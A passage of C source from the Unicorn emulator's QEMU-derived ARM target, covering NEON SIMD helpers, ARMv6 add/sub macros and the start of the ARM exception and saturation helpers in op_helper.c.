<< 48; return result; } uint64_t HELPER(neon_mull_u16)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_MULL(result, a, b, uint16_t, uint32_t); DO_MULL(tmp, a >> 16, b >> 16, uint16_t, uint32_t); return result | (tmp << 32); } uint64_t HELPER(neon_mull_s16)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_MULL(result, a, b, int16_t, uint32_t); DO_MULL(tmp, a >> 16, b >> 16, int16_t, uint32_t); return result | (tmp << 32); } uint64_t HELPER(neon_negl_u16)(uint64_t x) { uint16_t tmp; uint64_t result; #ifdef _MSC_VER result = (uint16_t)(0 - x); tmp = 0 - (x >> 16); result |= (uint64_t)tmp << 16; tmp = 0 - (x >> 32); result |= (uint64_t)tmp << 32; tmp = 0 - (x >> 48); #else result = (uint16_t)-x; tmp = -(x >> 16); result |= (uint64_t)tmp << 16; tmp = -(x >> 32); result |= (uint64_t)tmp << 32; tmp = -(x >> 48); #endif result |= (uint64_t)tmp << 48; return result; } uint64_t HELPER(neon_negl_u32)(uint64_t x) { #ifdef _MSC_VER uint32_t low = 0 - x; uint32_t high = 0 - (x >> 32); #else uint32_t low = -x; uint32_t high = -(x >> 32); #endif return low | ((uint64_t)high << 32); } /* Saturating sign manipulation. */ /* ??? 
Make these use NEON_VOP1 */ #define DO_QABS8(x) do { \ if (x == (int8_t)0x80) { \ x = 0x7f; \ SET_QC(); \ } else if (x < 0) { \ x = -x; \ }} while (0) uint32_t HELPER(neon_qabs_s8)(CPUARMState *env, uint32_t x) { neon_s8 vec; NEON_UNPACK(neon_s8, vec, x); DO_QABS8(vec.v1); DO_QABS8(vec.v2); DO_QABS8(vec.v3); DO_QABS8(vec.v4); NEON_PACK(neon_s8, x, vec); return x; } #undef DO_QABS8 #define DO_QNEG8(x) do { \ if (x == (int8_t)0x80) { \ x = 0x7f; \ SET_QC(); \ } else { \ x = -x; \ }} while (0) uint32_t HELPER(neon_qneg_s8)(CPUARMState *env, uint32_t x) { neon_s8 vec; NEON_UNPACK(neon_s8, vec, x); DO_QNEG8(vec.v1); DO_QNEG8(vec.v2); DO_QNEG8(vec.v3); DO_QNEG8(vec.v4); NEON_PACK(neon_s8, x, vec); return x; } #undef DO_QNEG8 #define DO_QABS16(x) do { \ if (x == (int16_t)0x8000) { \ x = 0x7fff; \ SET_QC(); \ } else if (x < 0) { \ x = -x; \ }} while (0) uint32_t HELPER(neon_qabs_s16)(CPUARMState *env, uint32_t x) { neon_s16 vec; NEON_UNPACK(neon_s16, vec, x); DO_QABS16(vec.v1); DO_QABS16(vec.v2); NEON_PACK(neon_s16, x, vec); return x; } #undef DO_QABS16 #define DO_QNEG16(x) do { \ if (x == (int16_t)0x8000) { \ x = 0x7fff; \ SET_QC(); \ } else { \ x = -x; \ }} while (0) uint32_t HELPER(neon_qneg_s16)(CPUARMState *env, uint32_t x) { neon_s16 vec; NEON_UNPACK(neon_s16, vec, x); DO_QNEG16(vec.v1); DO_QNEG16(vec.v2); NEON_PACK(neon_s16, x, vec); return x; } #undef DO_QNEG16 uint32_t HELPER(neon_qabs_s32)(CPUARMState *env, uint32_t x) { if (x == SIGNBIT) { SET_QC(); x = ~SIGNBIT; } else if ((int32_t)x < 0) { #ifdef _MSC_VER x = 0 - x; #else x = -x; #endif } return x; } uint32_t HELPER(neon_qneg_s32)(CPUARMState *env, uint32_t x) { if (x == SIGNBIT) { SET_QC(); x = ~SIGNBIT; } else { #ifdef _MSC_VER x = 0 - x; #else x = -x; #endif } return x; } uint64_t HELPER(neon_qabs_s64)(CPUARMState *env, uint64_t x) { if (x == SIGNBIT64) { SET_QC(); x = ~SIGNBIT64; } else if ((int64_t)x < 0) { #ifdef _MSC_VER x = 0 - x; #else x = -x; #endif } return x; } uint64_t HELPER(neon_qneg_s64)(CPUARMState *env, uint64_t x) { if (x == SIGNBIT64) { SET_QC(); x = ~SIGNBIT64; } else { #ifdef _MSC_VER x = 0 - x; #else x = -x; #endif } return x; } /* NEON Float helpers. */ uint32_t HELPER(neon_abd_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; float32 f0 = make_float32(a); float32 f1 = make_float32(b); return float32_val(float32_abs(float32_sub(f0, f1, fpst))); } /* Floating point comparisons produce an integer result. * Note that EQ doesn't signal InvalidOp for QNaNs but GE and GT do. * Softfloat routines return 0/1, which we convert to the 0/-1 Neon requires. 
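 * Negating that 0/1 result in unsigned 32-bit arithmetic turns it into
 * the 0x00000000 / 0xffffffff all-zeroes/all-ones mask NEON expects.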
*/ uint32_t HELPER(neon_ceq_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; return -float32_eq_quiet(make_float32(a), make_float32(b), fpst); } uint32_t HELPER(neon_cge_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; return -float32_le(make_float32(b), make_float32(a), fpst); } uint32_t HELPER(neon_cgt_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; return -float32_lt(make_float32(b), make_float32(a), fpst); } uint32_t HELPER(neon_acge_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; float32 f0 = float32_abs(make_float32(a)); float32 f1 = float32_abs(make_float32(b)); return -float32_le(f1, f0, fpst); } uint32_t HELPER(neon_acgt_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; float32 f0 = float32_abs(make_float32(a)); float32 f1 = float32_abs(make_float32(b)); return -float32_lt(f1, f0, fpst); } uint64_t HELPER(neon_acge_f64)(uint64_t a, uint64_t b, void *fpstp) { float_status *fpst = fpstp; float64 f0 = float64_abs(make_float64(a)); float64 f1 = float64_abs(make_float64(b)); return -float64_le(f1, f0, fpst); } uint64_t HELPER(neon_acgt_f64)(uint64_t a, uint64_t b, void *fpstp) { float_status *fpst = fpstp; float64 f0 = float64_abs(make_float64(a)); float64 f1 = float64_abs(make_float64(b)); return -float64_lt(f1, f0, fpst); } #define ELEM(V, N, SIZE) (((V) >> ((N) * (SIZE))) & ((1ull << (SIZE)) - 1)) void HELPER(neon_qunzip8)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 8) | (ELEM(zd0, 2, 8) << 8) | (ELEM(zd0, 4, 8) << 16) | (ELEM(zd0, 6, 8) << 24) | (ELEM(zd1, 0, 8) << 32) | (ELEM(zd1, 2, 8) << 40) | (ELEM(zd1, 4, 8) << 48) | (ELEM(zd1, 6, 8) << 56); uint64_t d1 = ELEM(zm0, 0, 8) | (ELEM(zm0, 2, 8) << 8) | (ELEM(zm0, 4, 8) << 16) | (ELEM(zm0, 6, 8) << 24) | (ELEM(zm1, 0, 8) << 32) | (ELEM(zm1, 2, 8) << 40) | (ELEM(zm1, 4, 8) << 48) | (ELEM(zm1, 6, 8) << 56); uint64_t m0 = ELEM(zd0, 1, 8) | (ELEM(zd0, 3, 8) << 8) | (ELEM(zd0, 5, 8) << 16) | (ELEM(zd0, 7, 8) << 24) | (ELEM(zd1, 1, 8) << 32) | (ELEM(zd1, 3, 8) << 40) | (ELEM(zd1, 5, 8) << 48) | (ELEM(zd1, 7, 8) << 56); uint64_t m1 = ELEM(zm0, 1, 8) | (ELEM(zm0, 3, 8) << 8) | (ELEM(zm0, 5, 8) << 16) | (ELEM(zm0, 7, 8) << 24) | (ELEM(zm1, 1, 8) << 32) | (ELEM(zm1, 3, 8) << 40) | (ELEM(zm1, 5, 8) << 48) | (ELEM(zm1, 7, 8) << 56); rm[0] = m0; rm[1] = m1; rd[0] = d0; rd[1] = d1; } void HELPER(neon_qunzip16)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 16) | (ELEM(zd0, 2, 16) << 16) | (ELEM(zd1, 0, 16) << 32) | (ELEM(zd1, 2, 16) << 48); uint64_t d1 = ELEM(zm0, 0, 16) | (ELEM(zm0, 2, 16) << 16) | (ELEM(zm1, 0, 16) << 32) | (ELEM(zm1, 2, 16) << 48); uint64_t m0 = ELEM(zd0, 1, 16) | (ELEM(zd0, 3, 16) << 16) | (ELEM(zd1, 1, 16) << 32) | (ELEM(zd1, 3, 16) << 48); uint64_t m1 = ELEM(zm0, 1, 16) | (ELEM(zm0, 3, 16) << 16) | (ELEM(zm1, 1, 16) << 32) | (ELEM(zm1, 3, 16) << 48); rm[0] = m0; rm[1] = m1; rd[0] = d0; rd[1] = d1; } void HELPER(neon_qunzip32)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 32) | (ELEM(zd1, 0, 32) << 32); uint64_t d1 = ELEM(zm0, 0, 32) | (ELEM(zm1, 0, 32) << 32); uint64_t m0 = ELEM(zd0, 1, 32) | (ELEM(zd1, 1, 32) << 32); uint64_t m1 = ELEM(zm0, 1, 32) | (ELEM(zm1, 1, 32) << 32); rm[0] = m0; rm[1] = m1; rd[0] = 
d0; rd[1] = d1; } void HELPER(neon_unzip8)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd = rd[0], zm = rm[0]; uint64_t d0 = ELEM(zd, 0, 8) | (ELEM(zd, 2, 8) << 8) | (ELEM(zd, 4, 8) << 16) | (ELEM(zd, 6, 8) << 24) | (ELEM(zm, 0, 8) << 32) | (ELEM(zm, 2, 8) << 40) | (ELEM(zm, 4, 8) << 48) | (ELEM(zm, 6, 8) << 56); uint64_t m0 = ELEM(zd, 1, 8) | (ELEM(zd, 3, 8) << 8) | (ELEM(zd, 5, 8) << 16) | (ELEM(zd, 7, 8) << 24) | (ELEM(zm, 1, 8) << 32) | (ELEM(zm, 3, 8) << 40) | (ELEM(zm, 5, 8) << 48) | (ELEM(zm, 7, 8) << 56); rm[0] = m0; rd[0] = d0; } void HELPER(neon_unzip16)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd = rd[0], zm = rm[0]; uint64_t d0 = ELEM(zd, 0, 16) | (ELEM(zd, 2, 16) << 16) | (ELEM(zm, 0, 16) << 32) | (ELEM(zm, 2, 16) << 48); uint64_t m0 = ELEM(zd, 1, 16) | (ELEM(zd, 3, 16) << 16) | (ELEM(zm, 1, 16) << 32) | (ELEM(zm, 3, 16) << 48); rm[0] = m0; rd[0] = d0; } void HELPER(neon_qzip8)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 8) | (ELEM(zm0, 0, 8) << 8) | (ELEM(zd0, 1, 8) << 16) | (ELEM(zm0, 1, 8) << 24) | (ELEM(zd0, 2, 8) << 32) | (ELEM(zm0, 2, 8) << 40) | (ELEM(zd0, 3, 8) << 48) | (ELEM(zm0, 3, 8) << 56); uint64_t d1 = ELEM(zd0, 4, 8) | (ELEM(zm0, 4, 8) << 8) | (ELEM(zd0, 5, 8) << 16) | (ELEM(zm0, 5, 8) << 24) | (ELEM(zd0, 6, 8) << 32) | (ELEM(zm0, 6, 8) << 40) | (ELEM(zd0, 7, 8) << 48) | (ELEM(zm0, 7, 8) << 56); uint64_t m0 = ELEM(zd1, 0, 8) | (ELEM(zm1, 0, 8) << 8) | (ELEM(zd1, 1, 8) << 16) | (ELEM(zm1, 1, 8) << 24) | (ELEM(zd1, 2, 8) << 32) | (ELEM(zm1, 2, 8) << 40) | (ELEM(zd1, 3, 8) << 48) | (ELEM(zm1, 3, 8) << 56); uint64_t m1 = ELEM(zd1, 4, 8) | (ELEM(zm1, 4, 8) << 8) | (ELEM(zd1, 5, 8) << 16) | (ELEM(zm1, 5, 8) << 24) | (ELEM(zd1, 6, 8) << 32) | (ELEM(zm1, 6, 8) << 40) | (ELEM(zd1, 7, 8) << 48) | (ELEM(zm1, 7, 8) << 56); rm[0] = m0; rm[1] = m1; rd[0] = d0; rd[1] = d1; } void HELPER(neon_qzip16)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 16) | (ELEM(zm0, 0, 16) << 16) | (ELEM(zd0, 1, 16) << 32) | (ELEM(zm0, 1, 16) << 48); uint64_t d1 = ELEM(zd0, 2, 16) | (ELEM(zm0, 2, 16) << 16) | (ELEM(zd0, 3, 16) << 32) | (ELEM(zm0, 3, 16) << 48); uint64_t m0 = ELEM(zd1, 0, 16) | (ELEM(zm1, 0, 16) << 16) | (ELEM(zd1, 1, 16) << 32) | (ELEM(zm1, 1, 16) << 48); uint64_t m1 = ELEM(zd1, 2, 16) | (ELEM(zm1, 2, 16) << 16) | (ELEM(zd1, 3, 16) << 32) | (ELEM(zm1, 3, 16) << 48); rm[0] = m0; rm[1] = m1; rd[0] = d0; rd[1] = d1; } void HELPER(neon_qzip32)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 32) | (ELEM(zm0, 0, 32) << 32); uint64_t d1 = ELEM(zd0, 1, 32) | (ELEM(zm0, 1, 32) << 32); uint64_t m0 = ELEM(zd1, 0, 32) | (ELEM(zm1, 0, 32) << 32); uint64_t m1 = ELEM(zd1, 1, 32) | (ELEM(zm1, 1, 32) << 32); rm[0] = m0; rm[1] = m1; rd[0] = d0; rd[1] = d1; } void HELPER(neon_zip8)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd = rd[0], zm = rm[0]; uint64_t d0 = ELEM(zd, 0, 8) | (ELEM(zm, 0, 8) << 8) | (ELEM(zd, 1, 8) << 16) | (ELEM(zm, 1, 8) << 24) | (ELEM(zd, 2, 8) << 32) | (ELEM(zm, 2, 8) << 40) | (ELEM(zd, 3, 8) << 48) | (ELEM(zm, 3, 8) << 56); uint64_t m0 = ELEM(zd, 4, 8) | (ELEM(zm, 4, 8) << 8) | (ELEM(zd, 5, 8) << 16) | (ELEM(zm, 5, 8) << 24) | (ELEM(zd, 6, 8) << 32) | (ELEM(zm, 6, 8) << 40) | (ELEM(zd, 7, 8) << 48) | (ELEM(zm, 7, 8) << 56); 
rm[0] = m0; rd[0] = d0; } void HELPER(neon_zip16)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd = rd[0], zm = rm[0]; uint64_t d0 = ELEM(zd, 0, 16) | (ELEM(zm, 0, 16) << 16) | (ELEM(zd, 1, 16) << 32) | (ELEM(zm, 1, 16) << 48); uint64_t m0 = ELEM(zd, 2, 16) | (ELEM(zm, 2, 16) << 16) | (ELEM(zd, 3, 16) << 32) | (ELEM(zm, 3, 16) << 48); rm[0] = m0; rd[0] = d0; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/op_addsub.h�����������������������������������������������������������0000664�0000000�0000000�00000003461�14675241067�0020335�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARMv6 integer SIMD operations. * * Copyright (c) 2007 CodeSourcery. * Written by Paul Brook * * This code is licensed under the GPL. */ #ifdef ARITH_GE #define GE_ARG , void *gep #define DECLARE_GE uint32_t ge = 0 #define SET_GE *(uint32_t *)gep = ge #else #define GE_ARG #define DECLARE_GE do{}while(0) #define SET_GE do{}while(0) #endif #define RESULT(val, n, width) \ res |= ((uint32_t)(glue(glue(uint,width),_t))(val)) << (n * width) uint32_t HELPER(glue(PFX,add16))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; ADD16(a, b, 0); ADD16(a >> 16, b >> 16, 1); SET_GE; return res; } uint32_t HELPER(glue(PFX,add8))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; ADD8(a, b, 0); ADD8(a >> 8, b >> 8, 1); ADD8(a >> 16, b >> 16, 2); ADD8(a >> 24, b >> 24, 3); SET_GE; return res; } uint32_t HELPER(glue(PFX,sub16))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; SUB16(a, b, 0); SUB16(a >> 16, b >> 16, 1); SET_GE; return res; } uint32_t HELPER(glue(PFX,sub8))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; SUB8(a, b, 0); SUB8(a >> 8, b >> 8, 1); SUB8(a >> 16, b >> 16, 2); SUB8(a >> 24, b >> 24, 3); SET_GE; return res; } uint32_t HELPER(glue(PFX,subaddx))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; ADD16(a, b >> 16, 0); SUB16(a >> 16, b, 1); SET_GE; return res; } uint32_t HELPER(glue(PFX,addsubx))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; SUB16(a, b >> 16, 0); ADD16(a >> 16, b, 1); SET_GE; return res; } #undef GE_ARG #undef DECLARE_GE #undef SET_GE #undef RESULT #undef ARITH_GE #undef PFX #undef ADD16 #undef SUB16 #undef ADD8 #undef SUB8 ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/op_helper.c�����������������������������������������������������������0000664�0000000�0000000�00000070144�14675241067�0020347�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM helper routines * * Copyright (c) 2005-2007 CodeSourcery, LLC * * This library is free software; you can redistribute 
it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" #include "exec/helper-proto.h" #include "internals.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #define SIGNBIT (uint32_t)0x80000000 #define SIGNBIT64 ((uint64_t)1 << 63) static CPUState *do_raise_exception(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el) { CPUState *cs = env_cpu(env); if (target_el == 1 && (arm_hcr_el2_eff(env) & HCR_TGE)) { /* * Redirect NS EL1 exceptions to NS EL2. These are reported with * their original syndrome register value, with the exception of * SIMD/FP access traps, which are reported as uncategorized * (see DDI0478C.a D1.10.4) */ target_el = 2; if (syn_get_ec(syndrome) == EC_ADVSIMDFPACCESSTRAP) { syndrome = syn_uncategorized(); } } assert(!excp_is_internal(excp)); cs->exception_index = excp; env->exception.syndrome = syndrome; env->exception.target_el = target_el; return cs; } void raise_exception(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el) { CPUState *cs = do_raise_exception(env, excp, syndrome, target_el); cpu_loop_exit(cs); } void raise_exception_ra(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el, uintptr_t ra) { CPUState *cs = do_raise_exception(env, excp, syndrome, target_el); cpu_loop_exit_restore(cs, ra); } uint32_t HELPER(neon_tbl)(uint32_t ireg, uint32_t def, void *vn, uint32_t maxindex) { uint32_t val, shift; uint64_t *table = vn; val = 0; for (shift = 0; shift < 32; shift += 8) { uint32_t index = (ireg >> shift) & 0xff; if (index < maxindex) { uint32_t tmp = (table[index >> 3] >> ((index & 7) << 3)) & 0xff; val |= tmp << shift; } else { val |= def & (0xff << shift); } } return val; } void HELPER(v8m_stackcheck)(CPUARMState *env, uint32_t newvalue) { /* * Perform the v8M stack limit check for SP updates from translated code, * raising an exception if the limit is breached. */ if (newvalue < v7m_sp_limit(env)) { CPUState *cs = env_cpu(env); /* * Stack limit exceptions are a rare case, so rather than syncing * PC/condbits before the call, we use cpu_restore_state() to * get them right before raising the exception. 
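         * GETPC() captures the host return address into the translated
         * code, which cpu_restore_state() uses to locate the TB and
         * resynchronize the guest PC before EXCP_STKOF is raised.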
*/ cpu_restore_state(cs, GETPC(), true); raise_exception(env, EXCP_STKOF, 0, 1); } } uint32_t HELPER(add_setq)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a + b; if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) env->QF = 1; return res; } uint32_t HELPER(add_saturate)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a + b; if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) { env->QF = 1; res = ~(((int32_t)a >> 31) ^ SIGNBIT); } return res; } uint32_t HELPER(sub_saturate)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a - b; if (((res ^ a) & SIGNBIT) && ((a ^ b) & SIGNBIT)) { env->QF = 1; res = ~(((int32_t)a >> 31) ^ SIGNBIT); } return res; } uint32_t HELPER(add_usaturate)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a + b; if (res < a) { env->QF = 1; res = ~0; } return res; } uint32_t HELPER(sub_usaturate)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a - b; if (res > a) { env->QF = 1; res = 0; } return res; } /* Signed saturation. */ static inline uint32_t do_ssat(CPUARMState *env, int32_t val, int shift) { int32_t top; uint32_t mask; top = val >> shift; mask = (1u << shift) - 1; if (top > 0) { env->QF = 1; return mask; } else if (top < -1) { env->QF = 1; return ~mask; } return val; } /* Unsigned saturation. */ static inline uint32_t do_usat(CPUARMState *env, int32_t val, int shift) { uint32_t max; max = (1u << shift) - 1; if (val < 0) { env->QF = 1; return 0; } else if (val > max) { env->QF = 1; return max; } return val; } /* Signed saturate. */ uint32_t HELPER(ssat)(CPUARMState *env, uint32_t x, uint32_t shift) { return do_ssat(env, x, shift); } /* Dual halfword signed saturate. */ uint32_t HELPER(ssat16)(CPUARMState *env, uint32_t x, uint32_t shift) { uint32_t res; res = (uint16_t)do_ssat(env, (int16_t)x, shift); res |= do_ssat(env, ((int32_t)x) >> 16, shift) << 16; return res; } /* Unsigned saturate. */ uint32_t HELPER(usat)(CPUARMState *env, uint32_t x, uint32_t shift) { return do_usat(env, x, shift); } /* Dual halfword unsigned saturate. */ uint32_t HELPER(usat16)(CPUARMState *env, uint32_t x, uint32_t shift) { uint32_t res; res = (uint16_t)do_usat(env, (int16_t)x, shift); res |= do_usat(env, ((int32_t)x) >> 16, shift) << 16; return res; } void HELPER(setend)(CPUARMState *env) { env->uncached_cpsr ^= CPSR_E; arm_rebuild_hflags(env); } /* Function checks whether WFx (WFI/WFE) instructions are set up to be trapped. * The function returns the target EL (1-3) if the instruction is to be trapped; * otherwise it returns 0 indicating it is not trapped. */ static inline int check_wfx_trap(CPUARMState *env, bool is_wfe) { int cur_el = arm_current_el(env); uint64_t mask; if (arm_feature(env, ARM_FEATURE_M)) { /* M profile cores can never trap WFI/WFE. */ return 0; } /* If we are currently in EL0 then we need to check if SCTLR is set up for * WFx instructions being trapped to EL1. These trap bits don't exist in v7. */ if (cur_el < 1 && arm_feature(env, ARM_FEATURE_V8)) { int target_el; mask = is_wfe ? SCTLR_nTWE : SCTLR_nTWI; if (arm_is_secure_below_el3(env) && !arm_el_is_aa64(env, 3)) { /* Secure EL0 and Secure PL1 is at EL3 */ target_el = 3; } else { target_el = 1; } if (!(env->cp15.sctlr_el[target_el] & mask)) { return target_el; } } /* We are not trapping to EL1; trap to EL2 if HCR_EL2 requires it * No need for ARM_FEATURE check as if HCR_EL2 doesn't exist the * bits will be zero indicating no trap. */ if (cur_el < 2) { mask = is_wfe ? 
HCR_TWE : HCR_TWI; if (arm_hcr_el2_eff(env) & mask) { return 2; } } /* We are not trapping to EL1 or EL2; trap to EL3 if SCR_EL3 requires it */ if (cur_el < 3) { mask = (is_wfe) ? SCR_TWE : SCR_TWI; if (env->cp15.scr_el3 & mask) { return 3; } } return 0; } void HELPER(wfi)(CPUARMState *env, uint32_t insn_len) { CPUState *cs = env_cpu(env); int target_el = check_wfx_trap(env, false); if (cpu_has_work(cs)) { /* Don't bother to go into our "low power state" if * we would just wake up immediately. */ return; } if (target_el) { if (env->aarch64) { env->pc -= insn_len; } else { env->regs[15] -= insn_len; } raise_exception(env, EXCP_UDEF, syn_wfx(1, 0xe, 0, insn_len == 2), target_el); } cs->exception_index = EXCP_HLT; cs->halted = 1; cpu_loop_exit(cs); } void HELPER(wfe)(CPUARMState *env) { /* This is a hint instruction that is semantically different * from YIELD even though we currently implement it identically. * Don't actually halt the CPU, just yield back to top * level loop. This is not going into a "low power state" * (ie halting until some event occurs), so we never take * a configurable trap to a different exception level. */ HELPER(yield)(env); } void HELPER(yield)(CPUARMState *env) { CPUState *cs = env_cpu(env); /* This is a non-trappable hint instruction that generally indicates * that the guest is currently busy-looping. Yield control back to the * top level loop so that a more deserving VCPU has a chance to run. */ cs->exception_index = EXCP_YIELD; cpu_loop_exit(cs); } /* Raise an internal-to-QEMU exception. This is limited to only * those EXCP values which are special cases for QEMU to interrupt * execution and not to be used for exceptions which are passed to * the guest (those must all have syndrome information and thus should * use exception_with_syndrome). */ void HELPER(exception_internal)(CPUARMState *env, uint32_t excp) { CPUState *cs = env_cpu(env); assert(excp_is_internal(excp)); cs->exception_index = excp; cpu_loop_exit(cs); } /* Raise an exception with the specified syndrome register value */ void HELPER(exception_with_syndrome)(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el) { raise_exception(env, excp, syndrome, target_el); } /* Raise an EXCP_BKPT with the specified syndrome register value, * targeting the correct exception level for debug exceptions. */ void HELPER(exception_bkpt_insn)(CPUARMState *env, uint32_t syndrome) { int debug_el = arm_debug_target_el(env); int cur_el = arm_current_el(env); /* FSR will only be used if the debug target EL is AArch32. */ env->exception.fsr = arm_debug_exception_fsr(env); /* FAR is UNKNOWN: clear vaddress to avoid potentially exposing * values to the guest that it shouldn't be able to see at its * exception/security level. */ env->exception.vaddress = 0; /* * Other kinds of architectural debug exception are ignored if * they target an exception level below the current one (in QEMU * this is checked by arm_generate_debug_exceptions()). Breakpoint * instructions are special because they always generate an exception * to somewhere: if they can't go to the configured debug exception * level they are taken to the current exception level. */ if (debug_el < cur_el) { debug_el = cur_el; } raise_exception(env, EXCP_BKPT, syndrome, debug_el); } uint32_t HELPER(cpsr_read)(CPUARMState *env) { /* * We store the ARMv8 PSTATE.SS bit in env->uncached_cpsr. * This is convenient for populating SPSR_ELx, but must be * hidden from aarch32 mode, where it is not visible. * * TODO: ARMv8.4-DIT -- need to move SS somewhere else. 
*/ return cpsr_read(env) & ~(CPSR_EXEC | PSTATE_SS); } void HELPER(cpsr_write)(CPUARMState *env, uint32_t val, uint32_t mask) { cpsr_write(env, val, mask, CPSRWriteByInstr); /* TODO: Not all cpsr bits are relevant to hflags. */ arm_rebuild_hflags(env); } /* Write the CPSR for a 32-bit exception return */ void HELPER(cpsr_write_eret)(CPUARMState *env, uint32_t val) { uint32_t mask; arm_call_pre_el_change_hook(env_archcpu(env)); mask = aarch32_cpsr_valid_mask(env->features, &env_archcpu(env)->isar); cpsr_write(env, val, mask, CPSRWriteExceptionReturn); /* Generated code has already stored the new PC value, but * without masking out its low bits, because which bits need * masking depends on whether we're returning to Thumb or ARM * state. Do the masking now. */ env->regs[15] &= (env->thumb ? ~1 : ~3); arm_rebuild_hflags(env); arm_call_el_change_hook(env_archcpu(env)); } /* Access to user mode registers from privileged modes. */ uint32_t HELPER(get_user_reg)(CPUARMState *env, uint32_t regno) { uint32_t val; if (regno == 13) { val = env->banked_r13[BANK_USRSYS]; } else if (regno == 14) { val = env->banked_r14[BANK_USRSYS]; } else if (regno >= 8 && (env->uncached_cpsr & 0x1f) == ARM_CPU_MODE_FIQ) { val = env->usr_regs[regno - 8]; } else { val = env->regs[regno]; } return val; } void HELPER(set_user_reg)(CPUARMState *env, uint32_t regno, uint32_t val) { if (regno == 13) { env->banked_r13[BANK_USRSYS] = val; } else if (regno == 14) { env->banked_r14[BANK_USRSYS] = val; } else if (regno >= 8 && (env->uncached_cpsr & 0x1f) == ARM_CPU_MODE_FIQ) { env->usr_regs[regno - 8] = val; } else { env->regs[regno] = val; } } void HELPER(set_r13_banked)(CPUARMState *env, uint32_t mode, uint32_t val) { if ((env->uncached_cpsr & CPSR_M) == mode) { env->regs[13] = val; } else { env->banked_r13[bank_number(mode)] = val; } } uint32_t HELPER(get_r13_banked)(CPUARMState *env, uint32_t mode) { if ((env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_SYS) { /* SRS instruction is UNPREDICTABLE from System mode; we UNDEF. * Other UNPREDICTABLE and UNDEF cases were caught at translate time. */ raise_exception(env, EXCP_UDEF, syn_uncategorized(), exception_target_el(env)); } if ((env->uncached_cpsr & CPSR_M) == mode) { return env->regs[13]; } else { return env->banked_r13[bank_number(mode)]; } } static void msr_mrs_banked_exc_checks(CPUARMState *env, uint32_t tgtmode, uint32_t regno) { /* Raise an exception if the requested access is one of the UNPREDICTABLE * cases; otherwise return. This broadly corresponds to the pseudocode * BankedRegisterAccessValid() and SPSRAccessValid(), * except that we have already handled some cases at translate time. 
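     * The checks left for run time all depend on the current mode, such
     * as an access targeting the current mode's own banked registers,
     * the USR r8-r12 bank (valid only from FIQ mode), and the
     * SPSR_Hyp/r13_hyp cases (valid only from Monitor mode).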
